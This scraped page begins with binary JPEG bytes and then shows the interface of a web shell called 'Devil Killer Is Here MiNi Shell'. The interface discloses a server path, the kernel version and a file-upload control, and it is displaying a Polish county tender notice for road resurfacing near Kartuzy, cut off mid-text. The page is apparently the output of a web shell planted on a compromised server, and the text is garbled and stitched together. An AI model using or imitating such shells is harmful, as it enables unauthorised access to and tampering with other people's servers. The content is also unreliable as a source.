JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230915/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230915/0039839501-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie odnowy/przebudowy nawierzchni bitumicznych na drogach powiatowych Powiatu Kartuskiego. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Kartuski - Zarząd Dróg Powiatowych w Kartuzach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 191687253</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Gdańska 26</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kartuzy</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">83-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL634 - Gdański</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">586810715</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">586811522</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@zdpk.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">zdp.kartuzy.ibip.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Zarządzanie drogami powiatowymi na terenie Powiatu Kartuskiego </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie odnowy/przebudowy nawierzchni bitumicznych na drogach powiatowych Powiatu Kartuskiego. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0a4b0511-53a2-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00398395</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-09-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00000919/23/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.13 Wykonanie odnowy/przebudowy nawierzchni bitumicznych na drogach powiatowych Powiatu Kartuskiego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/zdp_kartuzy <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/zdp_kartuzy</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Funkcjonalność platformy gwarantuje<br/>złożenie przez Wykonawcę w postępowaniu zaszyfrowanej oferty wraz z załącznikami, w sposób uniemożliwiający Zamawiającemu<br/>zapoznanie się z treścią oferty przed upływem terminu składania ofert. Za datę przekazania oferty na platformie przyjmuje się datę<br/>jej przekazania w systemie poprzez kliknięcie przycisku „Złóż ofertę” w kroku drugim składania oferty i wyświetleniu komunikatu, że<br/>oferta została złożona. W toku postępowania wszelka komunikacja, w tym oświadczenia, wnioski, zawiadomienia oraz inne<br/>informacje przekazywane będą za pomocą udostępnionego na platformie formularza „Wyślij wiadomość do zamawiającego”. Za datę<br/>przekazania oświadczeń, wniosków oraz innych informacji przyjmuje się datę ich przesłania za pośrednictwem platformy poprzez<br/>kliknięcie przycisku „Wyślij wiadomość do zamawiającego”, po którym pojawi się komunikat, że wiadomość została wysłana do<br/>zamawiającego. Informacje dotyczące odpowiedzi na pytania, zmiany SWZ, zmiany terminu składania i otwarcia ofert Zamawiający<br/>będzie zamieszczał na platformie w sekcji „Komunikaty”. Zalecenia odnośnie kwalifikowanego podpisu elektronicznego: dla<br/>dokumentów w formacie „pdf” zaleca się podpis w formatem PAdES, dokumenty w formacie innym niż „pdf” zaleca się podpisywać<br/>formatem XAdES. Zalecenia odnośnie podpisu osobistego: dla dokumentów w formacie „pdf” lub „xml” zaleca się podpis wewnętrzny<br/>(otoczony), dokumenty w formacie innym niż „pdf” zaleca się podpisywać podpisem zewnętrznym lub otaczającym. Zalecenia<br/>odnośnie podpisu zaufanego: wielkość dokumentów nie może przekraczać 10 MB, dostępny format podpisu „xml”. Zamawiający<br/>określa niezbędne wymagania sprzętowo – aplikacyjne umożliwiające pracę na platformie: stały dostęp do sieci Internet o<br/>gwarantowanej przepustowości nie mniejszej niż 512 kb/s, komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2G<br/>RAM, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych – MS Windows 7, Mac OS x 10.4, Linux lub<br/>ich nowsze wersje, zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10.0.,<br/>włączona obsługa JavaScript, zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf, oznaczenie<br/>czasu odbioru danych przez platformę stanowi datę oraz dokładny czas (hh:mm:ss), na platformie występuje limit objętości plików<br/>lub spakowanych folderów w zakresie całej oferty do ilości 10 plików lub spakowanych folderów przy maksymalnej wielkości 150MB.<br/>Zamawiający dopuszcza przysyłanie danych w formatach dopuszczonych odpowiednimi przepisami prawa tj.: mi.in.: .doc; .docx;<br/>.odt; .xls; .xlsx; .pdf przy czym Zamawiający zaleca wykorzystywanie plików w formacie .pdf . Zamawiający dopuszcza kompresję<br/>danych: .zip, .7Z. Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego akceptuje warunki korzystania z<br/>platformy, określone w regulaminie zamieszczonym na stronie internetowej: https://platformazakupowa.pl/pn/zdp_kartuzy oraz<br/>uznaje go za wiążący. Zamawiający informuje, że instrukcje korzystania z platformy znajdują się pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje oraz w zakładce prowadzonego postępowania. Zamawiający nie ponosi<br/>odpowiedzialności za złożenie oferty w sposób niezgodny z instrukcją korzystania z platformy, w szczególności za sytuację, gdy<br/>zapozna się z treścią oferty przed upływem terminu składania ofert. Taka oferta nie będzie brana pod uwagę w przedmiotowym<br/>postępowaniu. W przypadku przekazywania dokumentu elektronicznego w formacie poddającym dane kompresji, opatrzenie pliku<br/>zawierającego skompresowane dokumenty kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym<br/>jest równoznaczne z opatrzeniem wszystkich dokumentów zawartych w tym pliku podpisem kwalifikowanym, podpisem zaufanym<br/>lub podpisem osobistym. Wykonawca może również komunikować się za pomocą email: przetargi@zdpk.pl (za wyjątkiem oferty z<br/>załącznikami).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administratorem, czyli podmiotem decydującym o tym, które dane osobowe będą<br/>przetwarzane oraz w jakim celu, i jakimi sposobami, jest Zarząd Dróg Powiatowych w Kartuzach z siedzibą przy ul. Gdańskiej 26 w<br/>Kartuzach email: sekretariat@zdpk.pl<br/>Inspektor ochrony danych<br/>We wszystkich sprawach dotyczących ochrony danych osobowych, macie Państwo prawo kontaktować się z naszym Inspektorem<br/>ochrony danych na adres mailowy: iod@zdpk.pl<br/>Cel przetwarzania<br/>Państwa dane są przetwarzane w celu związanym z postępowaniem o udzielenie zamówienia publicznego, zawarcia i wykonania umowy w niniejszym postępowaniu.<br/>Podstawa przetwarzania danych<br/>Podstawa prawną przetwarzania danych są przepisy prawa: ustawa z dnia 11 września 2019 roku Prawo zamówień publicznych,<br/>ustawa o narodowym zasobie archiwalnym i archiwach (zgodnie z art. 6 ust. 1 lit. c) RODO). W przypadku dobrowolnego podania<br/>danych niewynikających z przepisów prawa podstawą przetwarzania Państwa danych osobowych jest Państwa zgoda wyrażona<br/>poprzez akt uczestnictwa w postępowaniu (zgodnie z art. 6 ust. 1 lit. a) RODO). Pełną treść obowiązku informacyjnego znajdziecie<br/>Państwo w pkt 25 SWZ niniejszego postępowania oraz na naszej stronie www<br/>http://zdp.kartuzy.ibip.pl w zakładce OCHRONA DANYCH OSOBOWYCH/ Klauzula informacyjna</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Ograniczenie dostępu do Państwa danych o których mowa wyżej może wystąpić jedynie<br/>w szczególnych przypadkach jeśli jest to uzasadnione ochroną prywatności zgodnie z art. 18 ust. 5 pkt) 1 i 2 ustawy z dnia 11<br/>września 2019 r. Prawo zamówień publicznych. Pełną treść obowiązku informacyjnego znajdziecie Państwo w pkt 25 SWZ<br/>niniejszego postępowania oraz na naszej stronie www http://zdp.kartuzy.ibip.pl w zakładce OCHRONA DANYCH OSOBOWYCH/<br/>Klauzula informacyjna</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZDP4.26.02.4.2023.SP</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ 1 - Wykonanie odnowy nawierzchni bitumicznych dróg powiatowych nr 1931G, 1913G i 1908G.<br/><br/>Inwestycja obejmuje swym zakresem wykonanie 3 odcinków dróg powiatowych:<br/>1)	DP nr 1931G w miejscowości Węsiory o długości ok. 430m,<br/>2)	DP nr 1913G w miejscowości Kołodzieje o długości ok. 400m,<br/>3)	DP nr 1908G w miejscowości Garcz o długości ok. 200m.<br/><br/>W ramach inwestycji przewiduje się wykonanie następujących prac: <br/>- frezowanie istniejącej nawierzchni bitumicznej <br/>- mechaniczne oczyszczenie warstw bitumicznych <br/>- skropienie warstw konstrukcyjnych emulsją asfaltową <br/>- wykonanie warstwy wiążącej z mieszanki mineralno-asfaltowej<br/>- wykonanie warstwy ścieralnej z mieszanki mineralno-asfaltowej<br/>- wyrównanie istniejącej podbudowy warstwą kruszywa łamanego 0/31,5 stabilizowanego mechanicznie<br/>- uzupełnienie i profilowanie poboczy z destruktu bitumicznego (po wcześniejszej ścince po-boczy)<br/>Przedmiar robót:<br/>I. droga 1931 G odc. m. Węsiory dł. 430 m pow. 2070 m2 :<br/>1	Frezowanie istniejącej nawierzchni bitumicznej gr. 4 cm na włączeniu	m2	10,0 ;<br/>2	Oczyszczenie warstw konstrukcyjnych mechanicznie	m2	2070,0 ;<br/>3	Skropienie warstw konstrukcyjnych emulsją asfaltową	m2	2070,0 ;<br/>4	Wykonanie warstwy wiążącej z grub. 3 cm o uziarnieniu AC11 m2	2070,0 ;<br/>5	Wykonanie warstwy ścieralnej grub. 3 cm AC 8	m2	2070,0 ;<br/>6	Profilowanie istniejącej nawierzchni z tłucznia	m2	2070,0 ;<br/>7	Wyrównanie istniejącej podbudowy z kruszywa łamanego stabilizowanego mechanicznie o uziarnieniu 0/31,5 gr. 8 cm	t	360,0 ;<br/>8	Uzupełnienie i profilowanie poboczy z destruktu bitum stabilizowanego mechanicznie m2	700,0 ;<br/>II. droga 1913 G odc. m. Kołodzieje dł. 400 m pow. 2070 m2 :<br/>1	Frezowanie istniejącej nawierzchni bitumicznej gr. 4 cm na włączeniu	m2	10,0 ;<br/>2	Oczyszczenie warstw konstrukcyjnych mechanicznie	m2	2070,0 ;<br/>3	Skropienie warstw konstrukcyjnych emulsją asfaltową	m2	2070,0 ;<br/>4	Wykonanie warstwy wiążącej z grub. 3 cm o uziarnieniu AC11 m2	2070,0 ;<br/>5	Wykonanie warstwy ścieralnej grub. 3 cm AC 8	m2	2070,0 ;<br/>6	Uzupełnienie i profilowanie poboczy z destruktu bitum stabilizowanego mechanicznie m2	700,0 ;<br/> III. droga 1908 G odc. m. Garcz dł. 200 m pow. 1000 m2:<br/>1	Frezowanie istniejącej nawierzchni bitumicznej gr. 4 cm na włączeniu	m2	0,0 ;<br/>2	Oczyszczenie warstw konstrukcyjnych mechanicznie	m2	1000,0 ;<br/>3	Skropienie warstw konstrukcyjnych emulsją asfaltową	m2	1000,0 ;<br/>4	Wykonanie warstwy wiążącej z grub. 3 cm o uziarnieniu AC11 m2	1000,0 ;<br/>5	Wykonanie warstwy ścieralnej grub. 3 cm AC 8	m2	1000,0 ;<br/>6	Uzupełnienie i profilowanie poboczy z destruktu bitum stabilizowanego mechanicznie m2	200,0 .<br/><br/>WARUNKI WYKONANIA I UWAGI KOŃCOWE<br/>1.	W przypadku napotkania w trakcie wykonywania robót uzbrojenia nie wykazane w inwentaryzacji, należy napotkane uzbrojenie traktować jako czynne, zabezpieczyć je i powiadomić odpowiedniego właściciela lub użytkownika.<br/>2. Wykonawca po zakończeniu prac musi uporządkować teren robót.<br/>3.	Zaleca się, aby wykonawca zdobył wszelkie informacje, które mogą być konieczne do przygotowania oferty oraz zawarcia umowy. Każdy z wykonawców ponosi pełną odpowiedzialność za skutki braku lub mylnego rozpoznania warunków realizacji zamówienia.<br/>4.	Do obowiązków Wykonawcy należy opracowanie i wprowadzenie czasowej organizacji ruchu na czas realizacji robót drogowych będących przedmiotem zamówienia – projekt na-leży zaopiniować w Zarządzie Dróg Powiatowych w Kartuzach i Komendzie Powiatowej Policji w Kartuzach a następnie uzyskać zatwierdzenie z Wydziału Komunikacji Starostwa Powiatowego w Kartuzach<br/>5.	Wykonawca jest odpowiedzialny za całokształt, w tym za przebieg oraz terminowe wykonanie przedmiotu zamówienia. Wymagana jest należyta staranność przy realizacji zobowiązań umowy.<br/>6.	Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez Zamawiającego z ustanowionym przedstawicielem Wykonawcy.<br/>7.	Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę pod-czas wykonywania przedmiotu zamówienia.<br/>8.	Materiały i urządzenia niezbędne do realizacji prac zapewnia Wykonawca.<br/><br/>Prace należy wykonać w oparciu o specyfikacje techniczne stanowiące załącznik nr 1a do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp do wysokości 100 % wartości zamówienia podstawowego (dotyczy obu części zamówienia) w zakresie wykonania podobnych robót budowlanych, co w przedmiotowym postępowaniu. Zakres zamówienia podobnego obejmuje wykonanie odpowiednio odnowy dla 1 części zamówienia lub przebudowy dla 2 części zamówienia nawierzchni bitumicznych na drogach powiatowych Powiatu Kartuskiego zgodnie z przedmiotem niniejszego zamówienia.<br/><br/>Warunki udzielenia zamówienia podobnego, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp:<br/><br/>1)	Wykonawca wykonał lub wykonuje należycie zamówienie podstawowe,<br/>2)	Wykonawca zapewni wykonanie zamówienia, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp w standardzie nie gorszym niż przyjęty do wykonania zamówienia podstawowego.<br/>3)	W ramach prowadzonych negocjacji, Zamawiający i Wykonawca dojdą do porozumienia odnośnie ceny i terminu wykonania.<br/>4)	Istotne postanowienia umowy o udzielenie zamówienia, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp, inne niż określone w pkt. 3 powyżej, będą zgodne z istotnymi postanowieniami umowy zawartymi w umowie dla zamówienia podstawowego.<br/>5)	Szacunkowe przedmiary robót dla zamówień podobnych:<br/>a.	dla części 1 zamówienia:<br/>I. droga 1931 G dł. 430 m :<br/>1	Frezowanie istniejącej nawierzchni bitumicznej gr. 4 cm na włączeniu	m2	10,0 ;<br/>2	Oczyszczenie warstw konstrukcyjnych mechanicznie	m2	2070,0 ;<br/>3	Skropienie warstw konstrukcyjnych emulsją asfaltową	m2	2070,0 ;<br/>4	Wykonanie warstwy wiążącej z grub. 3 cm o uziarnieniu AC11 m2	2070,0 ;<br/>5	Wykonanie warstwy ścieralnej grub. 3 cm AC 8	m2	2070,0 ;<br/>6	Profilowanie istniejącej nawierzchni z tłucznia	m2	2070,0 ;<br/>7	Wyrównanie istniejącej podbudowy z kruszywa łamanego stabilizowanego mechanicznie o uziarnieniu 0/31,5 gr. 8 cm	t	360,0 ;<br/>8	Uzupełnienie i profilowanie poboczy z destruktu bitum stabilizowanego mechanicznie m2	700,0 .<br/> II. droga 1913 G dł. 400 m :<br/>1	Frezowanie istniejącej nawierzchni bitumicznej gr. 4 cm na włączeniu	m2	10,0 ;<br/>2	Oczyszczenie warstw konstrukcyjnych mechanicznie	m2	2070,0 ;<br/>3	Skropienie warstw konstrukcyjnych emulsją asfaltową	m2	2070,0 ;<br/>4	Wykonanie warstwy wiążącej z grub. 3 cm o uziarnieniu AC11 m2	2070,0 ;<br/>5	Wykonanie warstwy ścieralnej grub. 3 cm AC 8	m2	2070,0 ;<br/>6	Uzupełnienie i profilowanie poboczy z destruktu bitum stabilizowanego mechanicznie m2	700,0 .<br/>III. droga 1908 G dł. 200 m :<br/>1	Frezowanie istniejącej nawierzchni bitumicznej gr. 4 cm na włą-czeniu	m2	0,0 ;<br/>2	Oczyszczenie warstw konstrukcyjnych mechanicznie	m2	1000,0 ;<br/>3	Skropienie warstw konstrukcyjnych emulsją asfaltową	m2	1000,0 ;<br/>4	Wykonanie warstwy wiążącej z grub. 3 cm o uziarnieniu AC11 m2	1000,0 ;<br/>5	Wykonanie warstwy ścieralnej grub. 3 cm AC 8	m2	1000,0 ;<br/>6	Uzupełnienie i profilowanie poboczy z destruktu bitum stabilizowanego mechanicznie m2	200,0 .</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający za najkorzystniejszą uzna ofertę niepodlegającą odrzuceniu, która uzyska największą liczbę punktów obliczona w oparciu o podane kryteria oceny ofert przedmiotu zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ 2 – Wykonanie przebudowy nawierzchni bitumicznej drogi powiatowej 1902G odc. Tuchom Barniewice. <br/>Inwestycja obejmuje swym zakresem wykonanie odcinka o długości 700m.<br/>W ramach inwestycji przewiduje się wykonanie następujących prac: <br/>- frezowanie istniejącej nawierzchni 